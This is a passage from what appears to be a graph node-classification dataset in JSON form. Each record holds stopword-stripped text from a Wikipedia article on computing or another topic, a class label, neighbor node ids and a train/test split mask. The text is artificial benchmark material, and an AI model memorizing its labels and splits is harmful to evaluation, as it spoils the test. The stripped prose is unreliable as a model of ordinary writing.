      11363,
      6760,
      10856,
      9835,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      2194,
      2197,
      2199,
      6296,
      2201,
      9370,
      9882,
      6813,
      9887,
      1190,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      739,
      7403,
      11500,
      1775,
      3312,
      242,
      5363,
      9972,
      246,
      9466,
      9468,
      1278,
      3328,
      11012,
      1804,
      8975,
      6416,
      273,
      8977,
      787,
      9490,
      789,
      5397,
      287,
      10016,
      6434,
      292,
      10235,
      2345,
      9004,
      7983,
      2355,
      1844,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      5969,
      7507,
      10068,
      9557,
      7511,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      890,
      8573,
      7039,
      2432,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      4506,
      11675,
      2462,
      927,
      2974,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      2995,
      10676,
      8631,
      2494,
      6078,
      9151,
      3522,
      11204,
      11205,
      4040,
      8136,
      8651,
      9166,
      6624,
      6625,
      3042,
      1509,
      2021,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      2036,
      5115,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8299,
    "label": 2,
    "text": "List_of_features_removed_in_Windows_10:list features removed windows 10 windows 10 version windows nt successor windows 8 features operating system removed comparison windows 8 windows 8.1 changes features offered occurred within subsequent feature updates windows 10",
    "neighbors": [
      8576,
      641,
      3463,
      651,
      5003,
      6797,
      8080,
      8976,
      10896,
      11283,
      2196,
      10900,
      4505,
      11546,
      3102,
      9375,
      4515,
      11301,
      3496,
      3881,
      6441,
      6697,
      1581,
      430,
      5935,
      1970,
      3250,
      3890,
      9910,
      6462,
      7615,
      321,
      7106,
      582,
      2630,
      9033,
      1098,
      10957,
      9173,
      11605,
      2391,
      3289,
      1113,
      4316,
      8798,
      11103,
      5600,
      10338,
      4326,
      2919,
      8296,
      5225,
      4074,
      4458,
      9448,
      10989,
      5103,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 8300,
    "label": 3,
    "text": "Out_Run:run game designed yu suzuki traveled europe gain inspiration game stages suzuki small team ten months program game leaving work game critical commercial success becoming one best-selling video games time sega successful arcade cabinet 1980s ported numerous video game consoles home computers spawned number sequels run cited influence upon later video games run 3d driving video game player controls ferrari testarossa spider third-person rear perspective camera placed near ground simulating ferrari driver position limiting player view distance road curves crests dips increases challenge obscuring upcoming obstacles traffic player must avoid object game reach finish line timer game world divided multiple stages end checkpoint reaching end stage provides time near end stage track forks give player choice routes leading five final destinations destinations represent different difficulty levels conclude ending scene among ferrari breaking presented trophy mid-1980s sega experienced success arcades games developed yu suzuki hang-on good seller enduro racer successful enough sega consider second production run motorcycle racing games run suzuki chance develop car racing game original concept base game american film cannonball run fan disliked racing games cars exploded impact wanted gamers enjoy experience driving feel superior suzuki initially conceived game setting across united states requested scout various locations according suzuki boss youji ishii sega president hayao nakayama believed us unsafe suggested europe safer option additionally suzuki concluded us large empty game design scouted europe two weeks bmw 520 ideas tour included frankfurt monaco rome swiss alps french riviera florence milan monaco suzuki inspired use ferrari testarossa playable car game returned japan arranged team find photograph one small team four programmers sound creator five graphic designers developed run suzuki use personnel available assigned projects time result suzuki programming planning spending extra hours studio complete development game within ten months suzuki believed difficult part developing game make fun possible achieved emphasizing design elements wide roads buildings radio soundtrack selection four cabinet designs released equipped steering wheel stick shift acceleration brake pedals two cabinet designs upright one force feedback steering wheel two models sit-down cabinets resemble in-game car use drive motor move main cabinet—turning shaking according onscreen action models feature stereo speakers mounted behind driver head arcade system board made specifically game sega outrun based sega system 16 suzuki stated often unable make games based existing hardware sega would create new board said designs always 3d beginning calculations system 3d even hang-on calculated position scale zoom rate 3d converted backwards 2d always thinking 3d game achieves 3d effects using sprite-scaling technique called super-scaler technology used one year earlier hang-on released september 1986 run fast sprite-scaling 3d motion provide smoother experience contemporary arcade games run original score composed hiroshi kawaguchi previously composed soundtracks games designed suzuki including hang-on soundtrack similar style latin caribbean music three selectable tracks featured passing breeze splash wave magical sound shower additional track last wave plays final score screen run arcade release received positive reviews became one popular arcade games year 1988 golden joystick award game year beating renegade last ninja run received arcade game year award beating renegade bubble bobble 1994 30,000 cabinets sold worldwide making sega best selling arcade cabinet 1980s clare edgeley reviewed arcade game computer video games sinclair user praising graphics element danger gameplay review commodore user described great game driving enthusiasts awarded score 9 10 gary penn writing crash called game highly polished praised attention detail sinclair peter shaw praised realism described frighteningly fast road race game 've ever played run ported numerous home consoles computers 250,000 copies 8-bit computer game ports published u.s. gold sold christmas 1987 run became fastest-selling best-selling computer game uk year sega master system version praised computer video games concluded thrill power arcade version games machine gave master system version score 72 stating master system version came closest original coin-op reviewers dragon described refreshing game provides hours entertainment computer gaming world named year best arcade translation sega reception 8-bit personal computer ports published elsewhere u.s. gold mixed zx spectrum version received positive scores sinclair sinclair user reviewers crash expressed disappointment low quality contrast arcade original games machine gave spectrum version score 61 noting machine technical limitations comparison master system commodore systems commodore versions received positive average reviews though computer video games described commodore 64 port rushed amstrad cpc port received score 8 40 computer video games described travesty 37 score amstrad action reviewer considered one worst arcade conversions ever reactions 16-bit versions generally positive atari st version 1988 described computer video games far perfect came closer arcade original ports 1991 sega genesis version also received positive reviews scoring 90 french gaming magazines joypad joystick well 85 swedish magazine svenska hemdatornytt numerous follow-up titles run including run 3-d 1988 turbo run 1989 run europa 1991 outrunners 1992 run 2 rad mobile 1991 similar run game name adopted subgenre synthwave based game soundtrack selectable in-game conversion run development hertz sharp x68000 according former hertz employee tsunetomo sugawara never released due company management cancelling development likewise 32x version also reportedly development sega never released well run listed among best games time publications next generation retro gamer stuff time organizations g4 nowgamer yahoo writing 1001 video games must play die joao diniz sanches praised run unforgettable design expertly tuned game balance describing game consummate exhibit oversubscribed genre one purest joyous experiences video gaming 2015 run appeared 4th place ign list top 10 influential racing games ever behind pole position gran turismo virtua racing according luke reilly traces run dna found series like test drive need speed project gotham racing burnout well modern racers like forza horizon games driveclub former sega arcade director akira nagai credited run similar games sega arcade success 1980s according nagai run particular really amazing time ... suzuki went make burner number games run still talked special kind wonder taikan games sega arcade business sega lowest performer sales gradually started rise ... personally hang-on run memorable titles helped lift arcade industry slump created entirely new genres",
    "neighbors": [
      5011,
      1693,
      8735,
      11690,
      9006,
      10931,
      11448,
      5820,
      11452,
      325,
      4043,
      9166,
      986,
      5340,
      11231,
      2530,
      3307,
      4716,
      2159,
      629,
      6390
    ],
    "mask": "None"
  },
  {
    "node_id": 8301,
    "label": 3,
    "text": "Timeline_of_DOS_operating_systems:timeline dos operating systems article presents timeline events history x86 dos disk operating systems 1973 2016 operating systems named dos generally part scope timeline dos releases forms",
    "neighbors": [
      6148,
      7173,
      10757,
      2055,
      6664,
      8713,
      10257,
      2066,
      4114,
      6675,
      7188,
      8729,
      2594,
      9762,
      548,
      5158,
      563,
      4150,
      3137,
      4674,
      8262,
      9286,
      4170,
      6730,
      7244,
      9298,
      9813,
      86,
      2135,
      10337,
      5220,
      7269,
      4712,
      2161,
      7285,
      4727,
      5756,
      4735,
      2179,
      6787,
      134,
      6797,
      3216,
      8851,
      4244,
      7317,
      6806,
      9363,
      9366,
      2201,
      10899,
      7325,
      3235,
      8355,
      10916,
      3238,
      7847,
      6313,
      7849,
      9391,
      6321,
      178,
      2226,
      9907,
      8373,
      9911,
      3769,
      8379,
      7356,
      5312,
      11458,
      5840,
      6352,
      1236,
      1237,
      1750,
      6868,
      9946,
      11487,
      5856,
      4836,
      9444,
      5357,
      2798,
      5359,
      3315,
      2804,
      9972,
      5368,
      3323,
      2811,
      11008,
      5377,
      3330,
      5384,
      6921,
      780,
      10508,
      6415,
      8976,
      2322,
      11539,
      5397,
      8474,
      3867,
      11550,
      292,
      5413,
      2345,
      11562,
      1324,
      7983,
      5425,
      7986,
      2355,
      8501,
      10550,
      4409,
      2874,
      4411,
      11068,
      7486,
      6463,
      7999,
      7495,
      2380,
      3916,
      8524,
      2383,
      8529,
      2901,
      3413,
      4441,
      9563,
      8540,
      2399,
      6498,
      6506,
      11627,
      11631,
      3953,
      11634,
      2933,
      3445,
      7032,
      2942,
      5503,
      1408,
      2432,
      3970,
      4483,
      10113,
      389,
      8075,
      10130,
      3477,
      408,
      7069,
      1952,
      10658,
      10670,
      5040,
      9137,
      11184,
      1976,
      954,
      10173,
      6078,
      8640,
      8129,
      3522,
      9665,
      4548,
      6596,
      6090,
      9166,
      5080,
      2525,
      5598,
      9194,
      1515,
      7151,
      6128,
      6129,
      9714,
      499,
      2045,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 8302,
    "label": 4,
    "text": "Trusted_system:trusted system security engineering subspecialty computer science trusted system system relied upon specified extent enforce specified security policy equivalent saying trusted system one whose failure would break security policy policy exists trusted system trusted enforce meaning word trust critical carry meaning might expected everyday usage system trusted user one user feels safe use trusts tasks without secretly executing harmful unauthorised programs trusted computing refers whether programs trust platform unmodified expected whether programs innocent malicious execute tasks undesired user trusted system also seen level base security system protection provided handled according different levels.this commonly found military information categorized unclassified u confidential c secret top secret ts beyond.these also enforces policies no-read no-write subset trusted systems division b division implement mandatory access control mac labels often assumed used processing classified information however generally untrue four modes one operate multilevel secure system multilevel mode compartmented mode dedicated mode system-high mode national computer security center yellow book specifies b3 a1 systems used processing strict subset security labels operated according particularly strict configuration central concept u.s. department defense-style trusted systems notion reference monitor entity occupies logical heart system responsible access control decisions ideally reference monitor tamper-proof b always invoked c small enough subject independent testing completeness assured per u.s. national security agency 1983 trusted computer system evaluation criteria tcsec orange book set evaluation classes defined described features assurances user could expect trusted system key provision highest levels assurance b3 a1 dedication significant system engineering toward minimization complexity size often cited trusted computing base tcb defined combination hardware software firmware responsible enforcing system security policy inherent engineering conflict would appear arise higher-assurance systems smaller tcb larger set hardware software firmware lies outside tcb therefore untrusted although may lead technically naive sophists arguments nature trust argument confuses issue correctness trustworthiness contrast tcsec precisely defined hierarchy six evaluation classes—the highest a1 featurally identical b3 differing documentation standards—the recently introduced common criteria cc —which derive blend less technically mature standards various nato countries—provide tenuous spectrum seven evaluation classes intermix features assurances arguably non-hierarchical manner lack philosophic precision mathematical stricture tcsec particular cc tolerate loose identification target evaluation toe support—even encourage—an inter-mixture security requirements culled variety predefined protection profiles strong case made even seemingly arbitrary components tcsec contribute chain evidence fielded system properly enforces advertised security policy even highest e7 level cc truly provide analogous consistency stricture evidentiary reasoning mathematical notions trusted systems protection classified information derive two independent interrelated corpora work 1974 david bell leonard lapadula mitre working close technical guidance economic sponsorship maj. roger schell ph.d. u.s. army electronic systems command ft. hanscom devised known bell-lapadula model less trustworthy computer system modeled terms objects passive repositories destinations data files disks printers subjects active entities—perhaps users system processes threads operating behalf users—that cause information flow among objects entire operation computer system indeed regarded history serializability-theoretic sense pieces information flowing object object response subjects requests flows time dorothy denning purdue university publishing ph.d. dissertation dealt lattice-based information flows computer systems mathematical lattice partially ordered set characterizable directed acyclic graph relationship two vertices either dominates dominated neither defined generalized notion labels —corresponding less full security markings one encounters classified military documents e.g top secret wnintel tk dumbo—that attached entities bell lapadula integrated denning concept landmark mitre technical report—entitled secure computer system unified exposition multics interpretation —whereby labels attached objects represented sensitivity data contained within object though often subtle semantic difference sensitivity data within object sensitivity object labels attached subjects represented trustworthiness user executing subject concepts unified two properties simple security property subject read object dominates greater close enough—albeit mathematically imprecise—interpretation confinement property *-property subject write object dominates properties loosely referred no-read-up no-write-down respectively jointly enforced properties ensure information flow downhill repository whence insufficiently trustworthy recipients may discover extension assuming labels assigned subjects truly representative trustworthiness no-read-up no-write-down rules rigidly enforced reference monitor provably sufficient constrain trojan horses one general classes attack sciz popularly reported worms viruses specializations trojan horse concept bell-lapadula model technically enforces confidentiality secrecy controls i.e address problem sensitivity objects attendant trustworthiness subjects inappropriately disclose dual problem integrity i.e. problem accuracy even provenance objects attendant trustworthiness subjects inappropriately modify destroy addressed mathematically affine models important named creator k. j. biba integrity models include clark-wilson model shockley schell program integrity model seaview model important feature macs entirely beyond control user tcb automatically attaches labels subjects executed behalf users files access modify contrast additional class controls termed discretionary access controls dacs direct control system users familiar protection mechanisms permission bits supported unix since late 1960s and—in flexible powerful form—by multics since earlier still access control lists acls familiar examples dacs behavior trusted system often characterized terms mathematical model—which may less rigorous depending upon applicable operational administrative constraints—that takes form finite state machine fsm state criteria state transition constraints set operations correspond state transitions usually necessarily one descriptive top-level specification dtls entails user-perceptible interface e.g api set system calls unix parlance system exits mainframe parlance element engenders one model operations trusted computing group creates specifications meant address particular requirements trusted systems including attestation configuration safe storage sensitive information trusted systems context national homeland security law enforcement social control policy systems conditional prediction behavior people objects within system determined prior authorizing access system resources example trusted systems include use security envelopes national security counterterrorism applications trusted computing initiatives technical systems security use credit identity scoring systems financial anti-fraud applications general include system probabilistic threat risk analysis used assess trust decision-making authorizing access allocating resources likely threats including use design systems constraints control behavior within system ii deviation analysis systems surveillance used ensure behavior within systems complies expected authorized parameters widespread adoption authorization-based security strategies default state default=deny counterterrorism anti-fraud purposes helping accelerate ongoing transformation modern societies notional beccarian model criminal justice based accountability deviant actions occur – see cesare beccaria crimes punishment 1764 – foucauldian model based authorization preemption general social compliance ubiquitous preventative surveillance control system constraints – see michel foucault discipline punish 1975 alan sheridan tr. 1977 1995 emergent model security geared towards policing risk management surveillance exchange information auditing communication classification developments led general concerns individual privacy civil liberty broader philosophical debate appropriate forms social governance methodologies trusted systems context information theory based definition trust 'trust essential communication channel transferred source destination using channel ed gerck information theory information nothing knowledge meaning context information theory information simply transferred source destination using communication channel transmission information available destination transfer zero information received party party expect—as measured uncertainty party message likewise trust defined gerck nothing friendship acquaintances employee-employer relationships loyalty betrayal overly-variable concepts trust taken purely subjective sense either feeling something purely personal psychological—trust understood something potentially communicable definition trust abstract allowing different instances observers trusted system communicate based common idea trust otherwise communication would isolated domains necessarily different subjective intersubjective realizations trust subsystem man machines may coexist taken together model information theory information expect trust know linking concepts trust seen qualified reliance received information terms trusted systems assertion trust based record information information channels deepening questions leads complex conceptions trust thoroughly studied context business relationships also leads conceptions information quality information integrates trust trustworthiness structure information information system conceived higher quality terms particular definitions accuracy precision means higher trustworthiness introduction calculus trust example 'if connect two trusted systems less trusted taken together given ibm federal software group suggested provides useful definition trust application information technology environment related information theory concepts provides basis measuring trust network centric enterprise services environment notion trust considered requisite achieving desired collaborative service-oriented architecture vision see also trusted systems project part global information society project gisp joint research project world policy institute wpi center advanced studies sci tech policy cas",
    "neighbors": [
      257,
      10756,
      402,
      3360,
      2737,
      2750,
      1350,
      7368,
      8904,
      4303,
      7887,
      10580,
      7515,
      4067,
      1509,
      3178,
      6509,
      2416,
      9846,
      2041,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8303,
    "label": 2,
    "text": "Cocoa_(API):cocoa api",
    "neighbors": [
      9732,
      4615,
      10765,
      2062,
      4111,
      5647,
      1042,
      541,
      9245,
      5663,
      3107,
      2603,
      44,
      5165,
      5677,
      3631,
      6700,
      4657,
      1074,
      9784,
      576,
      8771,
      8262,
      9802,
      5713,
      3670,
      4184,
      10841,
      2141,
      4702,
      2658,
      5219,
      2149,
      3691,
      9323,
      5743,
      8304,
      2673,
      6771,
      2676,
      9848,
      5754,
      7292,
      637,
      7806,
      9343,
      1664,
      1666,
      3719,
      10888,
      11402,
      7307,
      6797,
      8852,
      11412,
      1686,
      3734,
      7318,
      3228,
      2207,
      1699,
      10406,
      4777,
      5292,
      8877,
      1710,
      3248,
      11442,
      1715,
      692,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      4822,
      4310,
      9430,
      3289,
      9434,
      9943,
      4318,
      10470,
      231,
      2282,
      9451,
      5356,
      10478,
      2288,
      10480,
      2804,
      7928,
      8441,
      11513,
      7422,
      11521,
      9986,
      2819,
      1796,
      10512,
      9490,
      9491,
      1812,
      1813,
      4888,
      10011,
      11037,
      5409,
      3876,
      11559,
      811,
      3371,
      4398,
      7983,
      10036,
      823,
      7991,
      9529,
      1852,
      8000,
      1347,
      1348,
      4933,
      5961,
      10057,
      9035,
      8524,
      4943,
      1878,
      10586,
      6502,
      10088,
      4457,
      8554,
      9579,
      8557,
      5492,
      9589,
      7036,
      3462,
      8582,
      10122,
      6539,
      9100,
      5521,
      9109,
      3990,
      6555,
      10654,
      1439,
      2980,
      1448,
      9128,
      8618,
      8628,
      4544,
      9665,
      10176,
      8644,
      4550,
      6093,
      7118,
      7629,
      4057,
      3035,
      4571,
      3038,
      479,
      4068,
      5093,
      5605,
      487,
      9700,
      5612,
      10221,
      7663,
      5619,
      11257,
      7163,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8304,
    "label": 2,
    "text": "GNUstep:gnustep gnustep free software implementation cocoa formerly openstep objective-c frameworks widget toolkit application development tools unix-like operating systems microsoft windows part gnu project gnustep features cross-platform object-oriented ide apart default objective-c interface gnustep also bindings java ruby gnu guile scheme gnustep developers track additions apple cocoa remain compatible roots gnustep application interface roots cocoa nextstep openstep gnustep thus predates cocoa emerged apple acquired next technology incorporated development original mac os x gnustep initially effort gnu developers replicate technically ambitious nextstep programmer-friendly features gnustep began paul kunz others stanford linear accelerator center wanted port hippodraw nextstep another platform instead rewriting hippodraw scratch reusing application design decided rewrite nextstep object layer application depended first version libobjcx enabled port hippodraw unix systems running x window system without changing single line application source openstep specification released public 1994 decided write new objcx would adhere new apis software would become known gnustep gnustep contains set graphical control elements written objective-c programming language graphical user interface gui gnumail composed graphics control elements gnumail interact windowing system e.g x11 wayland graphical user interface rendered gnustep backend provides small set functions used user interface library interface actual windowing system also rendering engine emulates common postscript functions package gnustep-back provides following backends gnustep inherits design principles proposed openstep gnustep predates cocoa cocoa based openstep well objective-c language examples applications written ported gnustep foundation kit provides basic classes wrapper classes data structure classes application kit provides classes oriented around graphical user interface capabilities",
    "neighbors": [
      2050,
      1028,
      9223,
      10765,
      2062,
      8725,
      9245,
      3618,
      3107,
      2603,
      5165,
      5677,
      3631,
      8754,
      9784,
      576,
      8258,
      8771,
      10822,
      5703,
      7249,
      1112,
      10841,
      3674,
      2658,
      8295,
      9323,
      5743,
      8303,
      2673,
      9848,
      5754,
      7292,
      7806,
      5759,
      1664,
      8830,
      1666,
      2180,
      4230,
      9865,
      7307,
      6797,
      3734,
      9880,
      7325,
      3744,
      10406,
      4265,
      4777,
      3248,
      11442,
      692,
      2233,
      5833,
      1232,
      3286,
      4822,
      9943,
      9434,
      7904,
      10464,
      10470,
      3817,
      10478,
      10480,
      8436,
      8438,
      8441,
      9986,
      9491,
      1812,
      5397,
      2332,
      10012,
      10016,
      802,
      3876,
      11559,
      7983,
      6962,
      823,
      8505,
      2363,
      1347,
      1348,
      11589,
      8524,
      8539,
      10083,
      8554,
      9579,
      1394,
      5492,
      9589,
      7544,
      379,
      3462,
      8582,
      11654,
      10122,
      4493,
      5521,
      1939,
      3990,
      10654,
      5029,
      934,
      4520,
      9128,
      8618,
      11180,
      5555,
      8628,
      9148,
      10687,
      4544,
      8644,
      4550,
      8137,
      7629,
      4561,
      8147,
      2010,
      4571,
      3038,
      479,
      9696,
      8673,
      5093,
      998,
      5612,
      1007,
      5619,
      11257,
      3068,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 8305,
    "label": 2,
    "text": "How_does_one_patch_KDE2_under_FreeBSD?:one patch kde2 freebsd one patch kde2 freebsd internet meme russian internet culture question originally posted anime channel rusnet irc network may 8 2004 original post followed translation здравствуйте это канал об аниме -- да -- как мне пропатчить kde2 под freebsd hello anime channel — yes — patch kde2 freebsd first question rhetorical satirized disproportionate amount technical geeky conversations often occurring channel nothing anime later popularized became widely cited russophone chats 2006 phenomenon first received public attention asked many people prior july 6 online conference russian president vladimir putin due provoking campaigns became third popular question proposed asked conference first preved vladimir vladimirovich regard medved however hosts ask question 2007 revived number one frequently asked question similar conference president kazakhstan nursultan nazarbayev nazarbayev answered question seriously describing developments industry kazakhstan possible use open-source software december 2007 question became popular one preceding internet conference ukrainian president viktor yushchenko gave answer saying programmers secretariat able help patch kde2 different operating systems also recommended adoption newer software possible reference existence kde3 time february 2014 openbsd ports developer gave overview linux vacation eastern europe conference belarus patch kde4 openbsd reviving long-lived meme new light",
    "neighbors": [
      788
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8306,
    "label": 6,
    "text": "Mkfs:mkfs computer operating systems mkfs command used format block storage device specific file system command part unix unix-like operating systems unix block storage device must formatted file system mounted accessed operating system filesystem hierarchy command originally implemented first version unix method initialize either dectape using argument rk03 disk pack using r argument initialization process would write formatting data device contained empty file system created super-block i-list free list storage device established root directory entries .. self parent respectively rk03 disk packs 4872 available blocks initialization tapes 578 blocks 512 bytes/block mkfs executable kept /etc directory instead binary directory would inadvertently called destroy information later implementations unix-like operating systems included mkfs command including hp-ux minix sunos linux basic syntax command common modern implementations 'codice_1 type filesystem 'codice_2 target unix device write filesystem data usually device drive partition often command simply wrapper another command performs formatting specific file system example would call command codice_3 passing along appropriate arguments format device codice_4 ext3 filesystem default options command stored file codice_5 usually codice_6 directory depending implementation specific file system requested command may many options specified inode size block size volume label features see file system details filesystem-specific commands mkfs calls may invoked directly user command line linux convention name filesystem-specific commands codice_7 codice_8 abbreviation file system e.g. codice_9 codice_10 codice_11 etc file systems supported command vary implementation include msdos sco bfs cpm ext2 ext3 ext4 minix fat vfat hfs vxfs rf disk rk disk dectape ntfs",
    "neighbors": [
      3841,
      515,
      9733,
      9735,
      3976,
      4750,
      5397,
      2198,
      1304,
      6812,
      9762,
      7847,
      4398,
      7983,
      11568,
      823,
      1336,
      6459,
      7356,
      451,
      10436,
      965,
      10564,
      8522,
      3659,
      8651,
      10967,
      9946,
      7136,
      6369,
      6120,
      492,
      2545,
      4850,
      5106,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 8307,
    "label": 7,
    "text": "You_Need_a_Budget:need budget need budget ynab pronounced why-nab multi-platform personal budgeting program based envelope method 2013 popular personal finance software among lifehacker readers latest version dubbed new ynab launched december 30 2015 web-based application apps iphone ipad android devices previous version ynab 4 released june 2012 ynab 4 maintained 2016 company promises continue support ynab 4 users indefinitely ynab 3 released december 2009 ran multiple platforms using adobe air runtime previous versions included microsoft excel/openoffice.org calc spreadsheet implementation dubbed ynab basic discontinued july 2009 windows-only executable name ynab pro discontinued december 2009 ynab iphone released 2010 runs iphone ipod touch ipad standalone budgeting application instead designed complement ynab desktop application version tailored ipad including budgeting support released 2014 ynab android released september 2011",
    "neighbors": [
      5224,
      7532,
      7983,
      1008,
      1680,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 8308,
    "label": 4,
    "text": "Firewall_pinhole:firewall pinhole computer networking firewall pinhole port protected firewall allow particular application gain access service host network protected firewall leaving ports open firewall configurations exposes protected system potentially malicious abuse fully closed firewall prevents applications accessing services side firewall protection mechanism opening pinhole firewall implement user validation authorization firewalls performing network address translation nat function mapping external ip address port socket internal ip address port socket often called pinhole pinholes created manually programmatically temporary created dynamically specific duration dynamic connection permanent signaling functions firewalls sometimes automatically close pinholes period time typically minutes minimize security exposure applications require pinhole kept open often need generate artificial traffic pinhole order cause firewall restart timer",
    "neighbors": [
      3011,
      8998,
      1164,
      14,
      3150,
      3792,
      4435,
      6964,
      1942,
      3770
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8309,
    "label": 8,
    "text": "Website_correlation:website correlation website correlation website matching process used identify websites similar related websites inherently easy duplicate led proliferation identical websites similar websites purposes ranging translation internet marketing especially affiliate marketing internet crime locating similar websites inherently problematic may different languages different servers different countries different top-level domains website correlation used several known types correlation demonstrating different strengths weaknesses practical website correlation process may require combining two methods save time effort website owners duplicate major portions website code across many domains similarity code structure provide enough information correlation organizations known publicly search-able databases kind correlation include note websites sometimes utilize structure relationship websites coincidentally utilize content management system also known correlated reverse dns lookup websites may served server one ip address one subnet several organizations retain archives ip address data correlate data examples include note correlation via method may misleading websites frequently exist server aka shared hosting relationship websites may authored person organization website owners required provide contact information registrar obtain domain name domain ownership determined via whois protocol provides mechanism searching correlating ownership several organizations retain archives whois information provide searching correlation services examples include note website ownership information falsified outdated hidden public view website correlation via method accurate misleading impossible depending information contained whois records search engines provide search-able databases indexed website content search engine results lists correlated content similarity note method correlation inherently slow one must guess phrases search also related websites may contain literally similar content site translated another language websites frequently categorized tagged similarly via automated manual means examples publicly accessible website categorization databases include note manual categorization tag metadata methods inherently subjective automated categorization tagging methods inherently subject varying weaknesses strengths underlying categorization algorithms tracking ids used analytics affiliate identification frequently embedded website code ids used correlation imply common management websites publicly available websites correlating tracking id include",
    "neighbors": [
      6576,
      8204
    ],
    "mask": "Test"
  },
  {
    "node_id": 8310,
    "label": 7,
    "text": "Servage_AB:servage ab servage ab publ swedish cloud service provider headquartered stockholm sweden company parent company levonline servage communication servage hosting corporate name servage resulted words serve age combined almost spells company name name relates company ambition serve customers always keeping systems up-to-date modern technologies 2007 servage hosting became fully owned subsidiary tele5 voice services ab 2008 tele5 voice services ab changed name servage ab chairman tele5 voice services ab board per bergström felt servage better suited brand name international corporation",
    "neighbors": [
      225,
      1410,
      8865,
      7078,
      1650,
      8310
    ],
    "mask": "None"
  },
  {
    "node_id": 8311,
    "label": 1,
    "text": "Merchant_Navy_(United_Kingdom):merchant navy united kingdom merchant navy maritime register united kingdom comprises seagoing commercial interests uk-registered ships crews merchant navy vessels fly red ensign regulated maritime coastguard agency mca king george v bestowed title merchant navy british merchant shipping fleets following service first world war number nations since adopted title merchant navy existence significant period english british history owing growth trade imperial expansion dated back 17th century attempt made register seafarers source labour royal navy times conflict registration merchant seafarers failed successfully implemented 1835 merchant fleet grew successive years become world foremost merchant fleet benefiting considerably trade british possessions india far east lucrative trades sugar contraband opium china spices tea carried ships cutty sark helped entrench dominance 19th century first second world wars merchant service suffered heavy losses german u-boat attacks policy unrestricted warfare meant merchant seafarers risk attack enemy ships tonnage lost u-boats first world war around 7,759,090 tons around 14,661 merchant seafarers killed honour sacrifice made merchant seafarers first world war george v granted title merchant navy companies 1928 george v gave edward prince wales title master merchant navy fishing fleets retained accession throne january 1936 relinquished abdication december since edward viii title held sovereigns george vi elizabeth ii united kingdom british empire entered second world war september 1939 george vi issued message anxious days would like express officers men british merchant navy british fishing fleets confidence unfailing determination play vital part defence one would say task less essential people experience allotted navy army air force upon nation depends much foodstuffs raw materials transport troops overseas long glorious history proud bear title master merchant navy fishing fleets know carry duties resolution fortitude high chivalrous traditions calling safe hands god keep prosper great task second world war german u-boats sank nearly 14.7 million tons allied shipping amounted 2,828 ships around two thirds total allied tonnage lost united kingdom alone suffered loss 11.7 million tons 54 total merchant navy fleet outbreak second world war 32,000 merchant seafarers killed aboard convoy vessels war along royal navy convoys successfully imported enough supplies allow allied victory honour sacrifices made two world wars merchant navy lays wreaths remembrance alongside armed forces annual remembrance day service 11 november following many years lobbying bring official recognition sacrifices made merchant seafarers two world wars since merchant navy day became official day remembrance 3 september 2000 ensigns displayed stern vessel displayed gaff yardarm red ensigns defaced flown warrant onboard vessel house flags personal designed company displayed port halyard yardarm despite maintaining dominant position many decades decline british empire rise use flag convenience foreign competition led decline merchant fleet example 1939 merchant navy largest world 33 total tonnage 2012 merchant navy — yet still remaining one largest world — held 3 total tonnage 2010 merchant navy consisted 504 uk registered ships addition uk merchant marine interests possessed 308 ships registered countries 271 foreign-owned ships registered uk 2012 british merchant marine interests consisted 1,504 ships included ships either directly uk-owned parent-owned managed british company amounted alternatively according annual maritime shipping statistics provided british government department transport signatory stcw convention uk ships commanded deck officers engineering officers officers undergo 3 years training known cadetship one approved maritime colleges united kingdom include warsash maritime academy south tyneside college fleetwood plymouth university city glasgow college cadets usually choice two academic routes foundation degree higher national diploma successful completion results qualification marine operations marine engineering generally costs cadetship met sponsorship uk shipping company three years training cadets also go sea period year usually spread across cadetship affords practical education along academic time college prepares candidate separate final oral exam oral exam carried master mariner office maritime coastguard agency successful completion oral exam result award certificate competency international qualification issued uk government allows officer work qualified capacity onboard ship certificates issued different ranks officer usually return complete subsequent series studies reach highest qualification first uk deck officer certificates competency issued 1845 conducted final oral exam master mariner training regime officers set official syllabus merchant navy training board training still encompasses traditional trades celestial navigation ship stability general cargo seamanship includes training business legislation law computerisation deck officers marine engineering principles workshop technology steam propulsion motor diesel propulsion auxiliaries mechanics thermodynamics engineering drawing ship construction marine electrics well practical workshop training engineering officers historically person wishing become captain master prior 1973 five choices attend one three elite naval schools age 12 fixed-base hms conway hms worcester pangbourne nautical college would automatically lead apprenticeship seagoing cadet officer apply one several training programmes elsewhere go sea immediately applying directly merchant shipping company age 17 would three years prior training four years without seagoing experience aboard ship work-clothes mates deck crew direction bo'sun cleaning bilges chipping paint polishing brass cement washing freshwater tanks holystoning teak decks studying navigation seamanship bridge uniform direction officer taking exams become second mate historically composition crew uk ships diverse characteristic extant shipping companies trade extent british empire availability crew different ports one ship might largely british crew another might crew composed many indians chinese african sailors crews outside britain usually drawn areas ship traded far east trading ships either singapore hong kong crews banana boats west indian crews ships trading west africa southern africa african crews ships trading indian ocean including east africa crews indian subcontinent crews made recruits britain commonly used ships trading across north atlantic south america australia new zealand traditionally still ships crew run bosun overseen responsible deck officer usually chief mate ship may also different sub-departments galley radio department hospitality services overseen chief cook radio officer chief steward many roles changed ships crews become smaller commercial shipping ships radio department disappeared along radio officer colloquially known 'sparks replaced changes technology requirement 